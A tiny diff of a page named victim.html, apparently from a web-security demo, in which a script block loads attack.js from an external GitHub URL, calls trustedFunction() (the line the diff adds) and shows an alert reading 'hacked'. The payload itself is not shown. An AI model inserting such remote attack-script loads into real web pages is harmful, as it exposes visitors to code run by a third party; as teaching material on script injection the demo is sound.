--- a/victim.html
+++ b/victim.html
@@ -8,7 +8,7 @@
 
 <script text="type/javascript">
 loadExternalJS("third-party","https://raw.githubusercontent.com/tmasthay1/tmasthay1.github.io/master/attack.js")
-	
+trustedFunction();	
 alert("hacked");
 </script>
 
